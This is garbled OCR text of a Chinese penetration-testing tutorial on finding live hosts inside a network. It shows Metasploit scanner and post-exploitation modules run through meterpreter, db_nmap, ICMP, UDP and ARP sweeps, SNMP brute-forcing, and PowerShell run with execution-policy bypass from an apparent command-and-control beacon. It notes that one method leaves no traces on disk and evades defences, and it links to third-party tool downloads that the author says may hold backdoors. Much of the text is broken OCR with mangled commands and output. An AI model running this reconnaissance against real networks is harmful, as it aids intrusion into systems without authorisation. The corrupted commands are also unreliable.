*] Scanned 11 of 11 hosts (100% complete) 
x Auxiliary module execution completed 


auxiliary (scanner: pop3*pop3 version) > show options 
options (auxiliary/scanner/pop3/pop3 version): 
Current Setting Required Description 


192.168.1.110:120. yes The target address range or CIDR identifier 
110 j The target port {TCP} 


50 yes The number of concurrent threads 


iliary(scanner;pop3;/pop3 version) > exploit 


nned 5 of 11 hosts (45% complete) 
{100% complete) 
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msf auxiliary(scanner/postgres/postgres version) > show options 


Module options (auxiliary/scanner/postgres/postgres version): 


Name Current Setting Required Description 

DATABASE template yes The database to authenticate against 
PASSWORD msf no The password for the specified username, 
RHOSTS J27,0:0:71 yes The target address range or CIDR identif 
RPORT 5432 yes The target port 

THREADS 50 yes The number of concurrent threads 
USERNAME msf yes The username to authenticate as 
VERBOSE false no Enable verbose output 


msf auxiliary(scanner/postgres/postgres version) » exploit 


[^] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.6 on x86 64-pc-linux-gnu, c 
[^] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


maf auxiliary {scanner sp m S version] > show op 
Module options. (auxiliary/scanner/postgres/postgres version): 


Name Current Setting Required Des 


E template yes B data 0 ticate agai 
D 


me. Leave blank for a random password. 
ange or CIDR identifier 


r of concurrent thre 
rname to authenticate 
Enable verbose output 


version) > exploit 


64-pc-linux-gnu, compiled by gcc (Debian 4.9.2-10) 4,9.2, 64-bit (Post-Auth 





。 二 十 三 : 基于 auxiliary/scannerftp/anonymous 发 现 内 网 存活 主机 
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nsf auxiliary( 


Name 


FTPPASS 
FTPUSER 
RHOSTS 
RPORT 
THREADS 


24 
50 


Current Setting 
mozilla@example.com 
anonymous 
192.168.1.100-120 


scanner/ftp/anonymous) > show options 


nodule options (auxiliary/scanner/ftp/anonymous) : 


Required Description 

no The password for the specified userne 
no The username to authenticate as 

yes The target address range or CIDR ider 
yes The target port (TCP) 

yes The number of concurrent threads 


msf auxiliary(scanner/ftp/anonymous) > exploit 


H902:168.1.115: 
192.168.1.119: 


3 of 
6 of 
d OT 
Z1 of 


Scanned 
Scanned 
Scanned 
Scanned 


Auxiliary module 


21 - 192. 
21 - 192 
21 hosts (14% 


21 hosts (2896 
21 hosts (80% 


1698:1:7115:21 — 


:16691.119:21-— 


complete) 
complete) 
complete) 


21 hosts (100% complete) 


execution completed 


f auxiliary {scanner ftp/anonymous) > show options 


iodule options (auxiliary/scanner/ftp/anonymous): 


Current Setting 


mozillagexample.com 


anonymous 


192.168.1.100-120 


pil 
50 


21 


21 


Auxiliary module 


- 192,168.1.115:21. - 
-.192.168.1.119:21 


Required 


Anonymous READ (220 Slyar Ftpserv 
Anonymous READ (220 FTPserver) 


Description 


password for the specified username 
username to authenticate as 
target address range or CIDR identifier 
target port (TCP) 

2 number of concurrent threads 


hosts (14$ complete) 
hosts (28% complete) 
hosts (80% complete) 
hosts (100% complete) 
execution completed 


* —+Q: 基于 db_nmap 发 现 内 网 存活 主机 


Anonymous READ (22 
- Anonymous READ ( 


Slyar Ftpserver) 
FTPserver) 





MSF 内 置 强 大 的 端口 扫描 工具 Nmap， 为 了 更 好 的 区 别 ， 内 置 命 令 为 : db_nmap， 并 且 会 自动 
存储 nmap 扫 描 结果 到 数据 库 中 ， 方 便 快 速 查询 已 知 存活 主机 ， 以 及 更 快捷 的 进行 团队 协同 作 
战 ， 使 用 方法 与 nmap 一 致 。 也 是 在 实战 中 最 常用 到 的 发 现 内 网 存活 主机 方式 之 一 。 


例 : 
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3 
o 
A 


exploit(multi/handler) > db nmap -p 445 -T4 -sT 192.168.1.115-120 - -open 
Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 15:17 EST 
Nmap: Nmap scan report for 192.168.1.115 

Nmap: Host is up (0.0025s latency). 

Nmap: PORT STATE SERVICE 

Nmap: 445/tcp open microsoft-ds 

Nmap: MAC Address: 00:0C:29:AF:CE:CC (VMware) 

Nmap: Nmap scan report for 192.168.1.119 

Nmap: Host is up (0.0026s latency). 

Nmap: PORT STATE SERVICE 

Nmap: 445/tcp open microsoft-ds 

Nmap: MAC Address: 00:0C:29:85:D6:7D (VMware) 

Nmap: Nmap done: 6 IP addresses (2 hosts up) scanned in 13.35 seco 


quee T qu c qwe vo opu pu oquee quee pen p 
* * * * * 
y Dues pep deus. ev eer] re d. rer i TH B 


* 


+ 


* * * * 


* 


f exploit( i EE IESU 0 oopen 
Nmap: i A ap.org : E 5-17 15:17 EST 
Nmap: for 
Nmap: 

Nmap: 
Nmap: micro 
Nmap ; Ac [ jS: 00: :0 


Nmap: 

Nmap: 

Nmap: 

Nmap: 4 

Nmap: MAC Addr a 

Nmap: Nmap don à addr (2 hosts scanned in 13.35 seconds 





命令 hosts 查 看 数据 库 中 已 发 现 的 内 网 存活 主机 
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i p E 
mac name os name os flavor os. 
00:24:1d:dc:3b:16 
00:e0:81:bf:b9:7b 
00:30:6e:ca:10:b8 
9c:8e:99:c4:63:74  2013XXXXX Windows 2008 SP1 
00:13:57:01:d4:71 
00:13:57:01:d4:73 
Unknown 


WIN-6FEAACQJ691 Windows 2012 
WIN-G6FEAACQJ691 Windows 2012 


IDS Windows 2003 SP2 
JOHN-PC Windows 7 SP 
JOHN-PC Windows 7 Ultimate SP1 
LAPTOP-9994K8RP Windows 10 
00:0c:29:af:ce:cc VM 2003X86 Windows 2003 SP2 
WIN-S4H51RDJQ3M Windows 2012 
00:0c:29:85:d6:7d WINO3X64 Windows 2003 SP2 
Unknown 
WINDOWS-G4MMTV8 Windows 7 SPA 
Unknown 
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OPTIONS: 
-a, --add 
-d, --delete 


-C «coli,col2» 
-C <coli,col2> 


-h, --help 
-U,--Up 
-o <file> 


-0 «column» 


-R, --rhosts 
-S, --search 
-i,--info 
-n,--name 


-m, - -comment 
A 


msf exploit(multi/handler) > hosts -h 
Usage: hosts [ options ] [addri addr2 


-] 


Add the hosts instead of searching 


Delete the hosts instead of searching 


Only 
Only 
Show 
Only 
Send 


Order rows by specified column number 


show 
show 
this 
show 


hosts which 


help information 


are up 


output to a file in csv format 


the given columns (see list below) 







the given columns until the next restart (see list 


Set RHOSTS from the results of the search 
string to filter by 
the info of a host 


Search 
Change 
Change 
Change 
Add or 


the name of a host 


the comment of 


a host 


specify a tag to a range of hosts 


f exploit{multi handler) > hosts -h 
: hosts [ options ] [addrl : i 


-1,--info 
n,- -name 


-m,--comment 
z,-tag 


Add the hosts instead of searching 
Delete the hosts instead of searching 


Only 
Only 
Show 
Only 
Send 
Order rows 
Set RHOSTS 
Search 
Change 
Change 
Change 
add or 


the 
the 
the 


show the gi: 
show the given columns 
this help information 
show hasts which are up 

output to a file in csv format 


n columns {see list be 


until the nex 


by specified column number 
from the results of the search 


ng to filter by 
info of a host 
name of a host 


comment of a host 


1202 


specify a tag to a range of hosts 


rt {see list below) 









E. 
= Host 


Beses 


加 二 一 一 


address 


- 


192. 
192. 
192. 
192. 
192. 
192. 
192. 
192. 
192. 
192. 


(E 


168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 


er) > hosts 


00:0c:29:af:ce:cc 


00:0c:29:85:d6:7d 


n Est exploit (multi/handler ) > hosts 


00:0c:29:af:ce:cc 


00:0c:29:85:d6:7d 


-5 192 


name 


JOHN-PC 

JOHN-PC 

LAPTOP- 9994KGRP 
VM. 6 
WIN- S4H51RDJQ3M 
W å 


WINDOWS- GAMMT V8 


-S 192 


name 

JOHN-PC 

JOHN-PC 
LAPTOP - 9994K8RP 
VM 2003X86 
WIN-S4H51RDJQ3M 
WINO3X64 


WINDOWS - G4MMTV8 


os_ flavor 


Window: 
Wind 
Window: 


Windows 7 
Unknown 


1203 


os_name 

Windows 7 
Windows 7 
Windows 
Windows 
Windows 
Windows 
Unknown 
Windows 7 
Unknown 


client 
client 
client 
server 
server 
server 
device 
client 
device 


os_flavor 


purpose info comments 


SPZ 


SPRI 





基于 MSF 发 现 内 网 存活 主机 第 六 季 


注 : 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 
如 有 肾 圳 肿 ， 请 定期 检查 肾 圳 肿 的 大 小 变化 。 


攻击 机 : 192.168.1.102 & Debian 
靶 机 : 192.168.1.2 & Windows 7 
192.168.1.115 & Windows 2003 
192.168.1.119 & Windows 2003 


第 一 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


* auxiliary/scanner/discovery/arp sweep 
e auxiliary/scanner/discovery/udp sweep 
* auxiliary/scanner/ftp/ftp version 

* auxiliary/scanner/http/http version 

e auxiliary/scanner/smb/smb. version 


第 二 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/ssh/ssh version 

e auxiliary/scanner/telnet/telnet version 
e auxiliary/scanner/discovery/udp probe 
。 auxiliary/scanner/dns/dns amp 

¢ auxiliary/scanner/mysql/mysql version 


第 三 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


e auxiliary/scanner/netbios/nbname 
e auxiliary/scanner/http/title 

* auxiliary/scanner/db2/db2 version 
* auxiliary/scanner/portscan/ack 

* auxiliary/scanner/portscan/tcp 


第 四 季 主 要 介绍 scanner 下 的 五 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 ; 


e auxiliary/scanner/portscan/syn 

* auxiliary/scanner/portscan/ftpbounce 
* auxiliary/scanner/portscan/xmas 

* auxiliary/scanner/rdp/rdp scanner 

。 auxiliary/scanner/smtp/smtp version 


第 五 季 主 要 介绍 scanner 下 的 三 个 模块 ， 以 及 db_nmap 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


。 auxiliary/scanner/pop3/pop3 version 

* auxiliary/scanner/postgres/postgres version 
e auxiliary/scanner/ftp/anonymous 

e db nmap 
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有 要 介绍 post 下 的 六 个 模块 ， 辅 助 发 现 内 网 存活 主机 ， 分 别 为 : 


E windows/gather/arp scanner 

F windows/gather/enum_ ad computers 

E windows/gather/enum computers 

A windows/gather/enum_domain 

M . windows/gather/enum_domains 

E windows/gather/enum ad user comments 


上 于 程 中 ， 许 多 特殊 环境 下 scanner，db_nmap 不 能 快速 符合 实战 渗透 诉求 ， 尤 其 在 域 中 的 主 
时 生 发 现 ， 而 post 下 的 模块 ， 弥 补 了 该 诉求 ， 以 便 快速 了 解 域 中 存活 主机 。 


F 二 五; 基于 windows/gather/arp_scanner 发 现 内 网 存活 主机 


| E 
TF eterpreter > run windows/gather/arp scanner RHOSTS=192.168.1.110-120 THREADS-2C 
m p 
- La 
NS Running module against VM 2003X86 
TF] ARP Scanning 192.168.1.110-120 
| [8] IP: 192.168.1.115 MAC 00:0c:29:af:ce:cc (VMware, Inc.) 
| 1 [+] IP: 192.168.1.119 MAC 00:0c:29:85:d6:7d (VMware, Inc.) 
2 Tt , 
T 
E terpreter > run windows/gather/arp scanner RHOSTS-192.168.1.110-120 THREADS-20 


iing module against VM 2003X86 


Scanning 192.168.1,110 
2 j af:ce:ce (VMware, Inc.) 
1120. 85; d6:7d (VMware, Inc.) 





二 十 六 : 基于 windows/gatherenum_ad_computers 发 现 域 中 存活 主机 


meterpreter > run windows/gather/enum ad computers 


eterpreter » run windows/gather/enum ad computers 





* —++: 基于 windows/gatherenum_computers 发 现 域 中 存活 主机 


meterpreter > run windows/gather/enum computers 


[*] Running module against VM 2003X86 
[-] This host is not part of a domain. 


n 


leterpreter > run windows/gàáther/enum computers 


‘*] Running module against VM 2003X86 
This host is not part of a domain. 





* —- FA: 基于 windows/gatherenum_domain 发 现 域 中 存活 主机 
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meterpreter » run windows/gather/enum domain 








meterpreter > run vindows/gather/enum domain 





。 二 十 九 : #¥Fwindows/gather/enum_domains 发 现 域 中 存活 主机 
meterpreter > run windows/gather/enum domains 


[*] Enumerating DCs for WORKGROUP 
[-] No Domain Controllers found... 


meterpreter > run windows/gather/enum domains 


Enumerating DCs for Wi 
] No Domain Controllers 





。 =+: 基于 windows/gather/enum_ad_user_comments 发 现 域 中 存活 主机 


meterpreter > run windows/gather/enum ad user comments 


meterpreter » run windows/gather/enum ad user comments 





POST 下 相关 模块 如 : (F) 不 一 一 介绍 


e linux/gather/enum network 

e linux/busybox/enum hosts 

* windows/gather/enum ad users 

。 windows/gather/enum domain tokens 
e windows/gather/enum snmp 


至 此 ，MSF 发 现 内 网 存活 主机 主要 模块 介绍 与 使 用 完毕 。 
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FSglDataSourceEnumerator RWWA 网 存活 主机 


; SqlDataSourceEnumerator 发 现 内 网 存活 主机 


1 58/8 .net framework, 在 powershell 后 ， 调 用 起 来 更 方便 。 


lem Data.SqlClient 命名 空间 是 用 于 SQL Server 的 .NET 数据 提供 程序 。 在 net framework2.0 


的 服务 器 的 信息 。 返回 此 表 列 出 了 与 列表 匹配 提供 当 用 户 尝试 创建 新 的 连接 的 服务 器 实例 以 及 
connection Properties 对 话 框 中 ， 展 开 下 拉 列 表 ， 其 中 包含 所 有 可 用 的 服务 器 。 


ows PowerShell 
Midninistrator? 
\Administrator> PowerShell -Command “{System.Data.$ql1.SqilDataSourceEnumerator ]:: Instance .GetDataSources(>" 


erNane InstanceNane IisClustered Version 


FHI N~EL4ERJ@FSNB 18.58.1680.1 


*Nisers Midninistrator? m 





A. MM 
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X | Beacon 10.124 148 8@10744 x | Beacon 10.124 42 248@6192 








[+] received output: 





ServerName InstanceNanme IsClustered Version 
FWZXNQFWPT VIN SQLEXP 10. 50. 2500.0 
QXDXE-—SERVER 9.00. 2047.00 
[AD VIN SQLEXP 10. 50. 2500.6 
DLFW-WIN16 SQLSERVER 13. 0. 1300. 275 
VCENTER 10. 0. 1600. 22 
SSD400CTI 8.00. 194 
2015PUBSQL2008 

CMCCWAP 

JSDIANLINEW 

NONGQ—WULIANWAN 

ONEKEYPUBLISHDB 

PUBLIC_SERVER 

TEMPLATEW2008 


此 种 方法 ， 在 实战 中 ， 不 留 文件 痕迹 。 并 且 信 息 准 确 ， 发 现 主 机 也 可 。 可 应 对 目前 主流 安全 防御 产 


r2 
Ao 
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ICMP 发 现 内 网 存活 主机 
ICMP 发 现 内 网 存活 主机 
ICMP 简 介 : 


本 ott — 7-03 用 于 在 IP 主 机 、 路 由 器 之 间 传 递 控制 消息 。 控 制 消息 是 指 网 络 通 
续 机 是 否 可 达 、 路 由 是 否 可 用 等 网 络 本 身 的 消息 。 这 些 控制 消息 虽然 并 不 传输 用 户 数据 ， 但 
ATAP MUNA ESO. 


P amapis: 


foor@John:- 
ni-~# nmap -sn -PE -T4 192.168.1.0/24 


ing Nmap 7.40 ( https: //nmap. org ) at 2017-12-04 06:33 EST 


scan report for 192.168. 
028s latency). 


scan report for 192.168.1.107 
1s up. 
done: 256 IP addresses (4 hosts up) scanned in 1.82 seconds 





Yoot@John:~# nmap -sn -PE -T4 192.168.1.0/24 


in:-$ nmap -sn -PE -T4 192.168.1.0/24 


tarting Nmap 7.40 ( https://nmap.org ) at 2017-12-04 07:14 EST 
"ap scan report for 1 6 


sti is d to. 068s UU. 
Addr 


scan report for 192.168.1.107 
t is up. 
1.256 IP addresses (4 hosts up) scanned in 2.31 seconds 


IN || 
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for /L XP in (1,1,254) DO @ping -w 1 -n 1 192.168.1.XP | findstr "TTLz" 


G:\Users\Wohn>for /L 4P in (1.1,2545 DO 8ping -w 1 -n 1 192.168.1.ZP | finds, 
TTL=" 


A 192.168.1.1 的 回复 : 375-32 时 间 =6ms TTL-64 


dee 


自 192.168.1.100 的 回 eI TTL-64 
cB 192.168.1.191 的 回 字 节 =32 BHj[B]-144ms TTL-64 





powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1 


; Invoke-TSPingSweep -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -Resoh 


eHost -ScanPort -Port 445,135" 


ss -/Invoke-TSPingSweep.psi 


D:\Dpowershell.exe -exec bypass -Command “Import—-Module ./Invoke-TSPingSweep.pst 
; Invoke-TSPingSweep -StartAddress 192.168.1.1 —Endfddress 192.168.1.254 —Resolv 
eHost -ScanPort -Port 445,135" 


IPAddress HostName 


192.168.1.1 John-PC 
192.168.1.100 John-PC 





D:>tcping.exe -n 1 192.168.1.0 80 
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ping-exe -n 1 192.168.1.9 88 


192.168.1.0:88/tcp - No response — time-2022.885ms 


tatistics for 192.168.1.0:80 
probes sent. 
| successful, 1 failed. 
able to connect, cannot provide trip statistics. 





 powershellfil2sStcping (来 源 互 联网 ， 后 门 自 查 ) 


BEBE: hitps://pan.! 密码 : 9vge 


Te rs 
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基于 UDP 发 现 内 网 存活 主机 


基于 UDP 发 现 内 网 存活 主机 
UDP 简介 : 


UDP (User Datagram Protocol) 是 一 种 无 连接 的 协议 ， 在 第 四 层 -传输 层 ， 处 于 IP 协 议 的 上 一 层 。 
UDP 有 不 提供 数据 包 分 组 、 组 装 和 不 能 对 数据 包 进行 排序 的 缺点 ， 也 就 是 说 ， 当 报 文 发 送 之 后 ,是 
无 法 得 知 其 是 否 安全 完整 到 达 的 。 


UDP 显著 特性 : 


1.UDP 缺乏 可 靠 性 。UDP 本 身 不 提供 确认 ， 超 时 重 传 等 机 制 。UDP 数据 报 可 能 在 网 络 中 被 复制 ， 
被 重新 排序 ， 也 不 保证 每 个 数据 报 只 到 达 一 次 。 


2.UDP 数据 报 是 有 长 度 的 。 每 个 UDP 数据 报 都 有 长 度 ， 如 果 一 个 数据 报 正确 地 到 达 目 的 地 ， 那 么 
该 数据 报 的 长 度 将 随 数据 一 起 传递 给 接收 方 。 而 TCP 是 一 个 字 节 流 协议 ,没有 任何 (协议 上 的 ) 
记录 边界 。 


3.UDP 是 无 连接 的 。UDP 客户 和 服务 器 之 前 不 必 存 在 长 期 的 关系 。 大 多 数 的 UDP 实现 中 都 选择 忽 
略 源 站 抑制 差错 ， 在 网 络 拥塞 时 ， 目 的 端 无 法 接收 到 大 量 的 UDP 数据 报 。 


4.UDP 支持 多 播 和 广播 。 


1. nmap 扫 描 


rootQJohn:-£ nmap -sU -T5 -sV --max-retries 1 192.168.1.100 -p 500 


// 慢 的 令 人 发 指 


i:-$ nmap -SU -T5 -sV --max-retries 1 192.168.1.100 -p 500 


Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-27 00:48 EST 
Nmap scan report for 192 1.100 

Host is up (0.024s latency). 

PORT STATE SERVICE VERSION 


akmp 
8:0D:E6:48 (Tp-link Technologies) 


Service detection performed. Please report any incorrect results at https: //nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 109.44 seconds 





1. msf 扫 描 


msf > use auxiliary/scanner/discovery/udp probe 
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The local client address 
The target address range or CIOR identifier 
The number of concurrent th 

je} > set THREADS 10 


t RHOSTS 192.168.1.100 


It will be removed on or about 2016-11 
scanner/discove 
JOO OGIO OOo HORE EES 


68.1,100: (WORKGROUP: <00 : JOHN- PC: «Q0»: U : JOHN- PC 


Current Setting Required Description 

The number of hosts to probe in each set 
The target address range or CIDR identifier 
The number of concurrent thr ; 

set RHOSTS 192.168.1.1 

et RHOSTS 192,168, 

) > run 
ending 13 probes to 192.168,1,100->192.1 .100 (1 ) 
covered NetBIOS on 192.168.1.1 37 {WORKGROUP : : JOHN-PC:<O0>:U : JOHN- PC: «202;U :WORKGROUP: «1e»:G :0 


1 1 of 1 ho (100% complete) 
iliary module execution completed 





1. unicornscant3fá 


//linux F@ RHE 


Foot@John:~# unicornscan -mU 192.168.1.100 


unicornscan -mU 192. 


OF open netbios-ns[ 3 from 192.168.1.100 ttl 64 


c4 §j 





1. ScanLine 扫 描 


项 目地 址 : https://www.mcafee.com/ca/downloads/free-tools/scanline.aspx 


网 盘 地 址 : http://pan.baidu.com/s/1i4A1wLR 密码 : hvyx 


4 


McAfee 出 品 ，win 下 使 用 推荐 。 管 理 员 执行 。 
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BcanLine <TM) 1.61 
opyright <c> Foundstone,. Inc. 2002 
at tp: //uwu8.foundstone.com 


1 [-?bhijnprsTUvz1 
[-cdgnq <n?) 
[-flLoO <file>] 
[-tu &noL,Xn»-Xn»11 
EPESIP-IPA 


Shows this help text 

Get port banners 

Timeout for TCP and UDP attempts <ms>. Default is 4668 

Delay between scans Cms). Default is 8 

Read IPs from file. Use “stdin” for stdin 

Bind to given local port 

Hide results for systems with no open ports 

For pinging use ICMP Timestamp Requests in addition to Echo Requests 
Don't output " “ separator between IPs 

Read TCP ports from file 

Read UDP ports from file 

Bind to given local interface IP 

No port scanning ~ only pinging unless you use -p5 

Output file Coverwrite> 

Output file (append? 

Do not ping hosts before scanning 

Timeout for pings Cms). Default is 2068 

Resolve IP addresses to hostnames 

Output in comma separated format (csu) 

TCP port<s> to scan (a comma separated list of ports/ranges) 
Use internal list of TCP ports 

UDP port(s? to scan Ca comma separated list of ports/ranges)> 
Use internal list of UDP ports 

Uerbose mode 

Randomize IP and port scan order 


xanple: sl -bht 80,100-200.443 16.6.0.1-260 


Copyright <c) Foundstone, Inc. 2002 
http://www .foundstone.conm 


Scan of 1 IP started at Mon Nou 27 14:29:09 2617 





192.168.1.1098 

Responded in 8 ms. 

8 hops away 

Responds with ICMP unreachable: Yes 


UDP ports: 588 








map 的 udp 扫 描 : T: y Nie] 


entest-tools.com/network-vulnerability-scanning/udp-port-scanner-online 
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基于 ARP 发 现 内 网 存活 主机 
基于 ARP 发 现 内 网 存活 主机 


ARP 简 介 : 
ARP, 通 过 解析 网 路 层 地 址 来 找寻 数据 链 路 层 地 址 的 一 个 在 网 络 协议 包 中 极其 重要 的 网 络 传输 协议 。 


根据 IP 地 址 获取 物理 地 址 的 一 个 TCP/P 协 议 。 主 机 发 送信 息 时 将 包含 目标 |P 地 址 的 ARP 请 求 广播 到 
网 络 上 的 所 有 主机 ， 并 接收 返回 消息 ， 以 此 确定 目标 的 物理 地 址 


1. nmap 扫 描 


root@John:~# nmap -sn -PR 192.168.1.1/24 


rootgJohn: -* nmap -sn -PI 


Starting Mmap 7.40 ( https://nmap.org ) at 2017-11-27 02:32 EST 
Nmap scan.report for 192. ed 
Host is up (0.0055s latency 
MAC Address; D8:15:0 
scan report for 192 
| (ü latency). 


scan 
is up (0.í 
MAC Address: 2 
Nmap scan report for 192,168.1.1( 
Host 1s up. 
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.08 seconds 





1. msf 扫 描 
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INTERFACE 


RHOSTS 


SHOST 


SMAC 


THREADS 1 


TIMEOUT 5 


X 
i 


DUmsf auxiliary(arp sweep) > set 


E 

] 

P 
D 

b 

+ 

P 

j 

| f 

: 

P 


j . RHOSTS => 192.168.1.0/24 


msf auxiliary(arp_sweep) > set 


le options (auxiliary /scanne 


Wodule options (auxiliary/scanner/discovery/arp_sweep) : 


Required Description 


no The name of the interface 

yes The target address range or CIDR identi 
no Source IP Address 

no Source MAC Address 

yes The number of concurrent threads 

yes The number of seconds to wait for new c 


RHOSTS 192.168.1.0/24 


THREADS 10 


auxiliary (arp sweep) > show options 


overy/arp sweep): 


| Name Current Setting Required Description 


ERFACE ethd 
S 192.168.1.0/24 


10 
5 


The name of the interface 

The target address range or CIDR identifier 
Source IP Addre 

Source MAC Addr 

The number of concurrent threads 

The number of seconds to wait for new data 
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auxiliary (arp sweep) > run 


192.168.1.1 appears to be up (UNKNOWN). 
192.168.1.103 appears to up (UNKNOWN). 
192.168.1.100 appears to be up (UNKNOWN). 


192.168.1.105 appears to up (UNKNOWN). 
192.168.1.107 appears to be up (UNKNOWN). 
192.168.1.108 appears to up (UNKNOWN). 
Scanned 256 of 256 hosts (100% complete) 
Auxiliary module execution completed 


1 
1 
192.168.1.102 appears to up (UNKNOWN) . 
1 
1 





1. netdiscover 


root@John:~# netdiscover -r 192.168.1.0/24 -i wlanO 


RX errors 0 dropped O overruns O frame O 
TX packets 22 bytes O (0.0 B) 
TX errors 0 dropped © overruns @ carrier O collisions 0 


8: flags-4163«UP, BROADCAS CAST» mtu 1500 
inet 172.16.81.1 netm d 2 255.0 broadcast 172.16.81.255 
inet6 feB80::250:56ff:fecO:8 prefixlen 64 scopeid Ox20clink- 
ether 00:50:56:c0: 08 txqueuelen 1000 (Ethernet) 
RX packets © bytes 0 (0.0 B) 
RX errors © dropped O overruns © frame 0 
TX packets 21 bytes O (0.0 B) 
TX errors O dropped O overruns O carrier O collisions O 


wlanO: tlags=4163<UP, BROADCAST, RUNNING, MULTI > mtu 1500 
inet 192. 108, 1,10: tmask 255.255.255.0 broadcast 192.168.1.255 
inet6 feB80::5623 204595216) prefixlen 64 scopeid Ox20<link> 
ether 28:16: ad: 3b; xqueuelen 1000 (Ethernet) 
RX packets 297 bytes 26603 (25.9 KiB) 
RX errors © dropped O overruns © frame O 
TX packets 8908 bytes 634554 (619.6 KiB} 
TX errors O dropped O overruns O carrier G collisions O 


rooteJohn:-# netdiscover -r 192.168.1.0/24 -1 wlan 

Currently scanning: Finished! | Screen View: Unique Hosts 

4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 168 
At MAC Address Count 


Unknown vendor 


2169. 1.1 "c H 2 
2.168.1.100 : 86:48 2 j4 TP-LINK TECHNOLOGIES CO., 
H 


92.168.1.107 . 74:4a:34:69: fb: eb zte corporation 





1. arp-scan (linux) 
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gam stunt 


地 址 : https://linux.die.net/man/1/arp-scan 


ecan 没 有 内 置 Kkali， 需要 下 载 安装 。 


:~# apt-get install arp-scan 
ing package lists... Done 
ing dependency tree 
state information... Done 
owing packages were automatically installed and are no longer req 
vdevice57 libboost-chronol.62.0 libboost-program-opt 
Q libcdio: cdda2 libcdio-paranoia2 libediolé libcgall 
16 3 libiso9650-8 MOI MES [e libtwgeom- dev libo 


iram aqua: plugins enis core2.14, 1l ibaa co 
s aly 14,11 bio 2.14.11 libgtwebkit4 libqvt 
ial libvcdinfoQ li 2 ne2-bin libxine2-doc libxin 
atialite python- qgis- common python-qt4-sql python-shapely qt 
p to remove them. 
owing packages will be upgraded: 
jrp-scan 
upgraded, —0 newly installed, O to remove and 1362 not upgraded. 
| to get O0 B/263 kB of archives, 


ter this operation, 1,024 B of additional disk space will be used. 
eading changelogs... Done 
aging database |.. 398259 files and directories currently installed.) 
ring to unpack .../arp-scan 1.9-3 amd64.deb ... 
packing arp-scan (1.9-3) over {1.9-1) 
etting up arp-scan (1,9-3) 


n:-$ arp-scan --interface-wlanO --localnet 
0, datalink type: ENIOMB (Ethernet) 
9 with 256 hosts (http: //www.nta-monitor.com/tools/arp-scan/) 
:15:0d: fb:85:3d (Unknown) 
:f1:e8:81:6e:cf (Unknown? 
:9f:70:16:cd:66 (Unknown) 
:18:9a:fd:e3:e9 (Unknown) 
': 82: 68: Od: e6: 48 TP-LINK TECHNOLOGIES CO.,LTD. 
43:34:69: fb:eb (Unknown) 


by filter, O packets dropped by kernel 
: 256 hosts scanned in 2.676 seconds (95.67 hosts/sec). 6 responded 


1. Powershell 


c: mp»powershell.exe -exec bypass -Command "Import-Module .arpscan.psi;Invoke 


ARPScan -CIDR 192.168.1.0/24" 
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c:Ntnp^powershell.exe -exec bypass -Command "Imnport-Module .\arpscan-ps1;in,,) 
ARPScan -CIDR 192.168.1.0/24" 


Address 
D8:15:0D:FB:85:3D 192.168.1.1 
0C:82:68:80D:E6:48 192.168.1.188 
880:58:56:F0:C8:C6 192.168.1.254 
Hn:50:56 :CB:88:08 192.168.1.255 









1. arp scannet 


stert IP address 32. 168. 1.0 


2 


end IP address |!92. 168. 1.255 


7 F: 








7 30sec 

3 Output E 

s Wednesday 8 2017/11/29 20:03:34 “20:03:34. 1822 
7 speed 

: + 
~ lsec 


scan at 1000 milisec per IP 
more info at http: //sourceforge net/projects/arpscannet/ 


1. arp-scan (windows) 
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pss 


Mecan.exe -t 192.168.1.1/24 


p^arp-scan.exe 
: arp-scan.exe ~t [IP^slashl or [IP] 


np^?arp-scan.exe >t 192.168.1.1/24 


ly that 66:56:56:C@:@6:@8 is 192.168.1.1 in 6.099913 

|y that 0:82:68:8D:E6:48 is 192.168.1.100 in 0.871841 

ly that 88:50:56:FB8:C0:C6 is 192.168.1.254 in 8.676449 
ply that 08:50:56:C08:88:08 is 192.168.1.255 in 8.054635 





1. arp-ping.exe 


" arp-ping.exe 192.168.1.100 


:-\tmp>arp-ping.exe 192.168.1.1806 


ing statistics for 192.168.1.166/arp 
4 probes sent. 
4 successful, @ failed. 
Pproximate trip times in milli-seconds: 
Minimum = 0.086ms. Maximum = @.29@ms, Average = 


1. 其 他 


如 Cain 的 arp 发 现 ， 一 些 开源 py，pl1 脚 本 等 ， 不 一 一 介绍 。 
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ply that 8C:82:68:0D:E6:48 is 192.168.1.1080 in @.29@ms 
ply that @C:82:68:@D:E6:48 is 192.168.1.108 in @.@86ms 
ply that @C:82:68:@D:E6:48 is 192.168.1.100 in 8.8092ms 
'ply that @C:82:68:@D:E6:48 is 192.168.1.188 in 8.104ms 


0.143ms 





以 上 非 内 置 文件 网 盘 位 置 。 后 门 自 查 。 


链接 : https://pan.baidu.com/s/1boYuraJ 密码 : 58wf 
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zTsnmp A JL 网 存活 主机 
eNMPÍS T: 







ENMP 是 一 1 
p. SN 
SNMP 





ni~# nmap -sU - 


-script snmp-brute 192.168.1.0 


/24 -T4 


Nmap 7.40 ( https: //nmap.org ) at 2017-12-03 23:11 EST 


^ : l o» 
0:00:44 elapsed; 252 hosts completed 
1 Timing: About 69.33% done; ETC: 23 
0:05:00 elapsed; 252 hosts completed 
| Timing: About 77.44$ done; ETC; 
0:08:57 elapsed; 252 hosts completed 
| Timing: About 85.00$ done; 


| Timing: About 100.00& done; 
an report for 192.168.1.1 
up (0.0071s latency). 
n: 992 closed ports 
STATE SERVICE 
open domain 
open|filtered dhcps 
open|filtered dhcpc 
open|filtered L2TP 
open|filtered upnp 
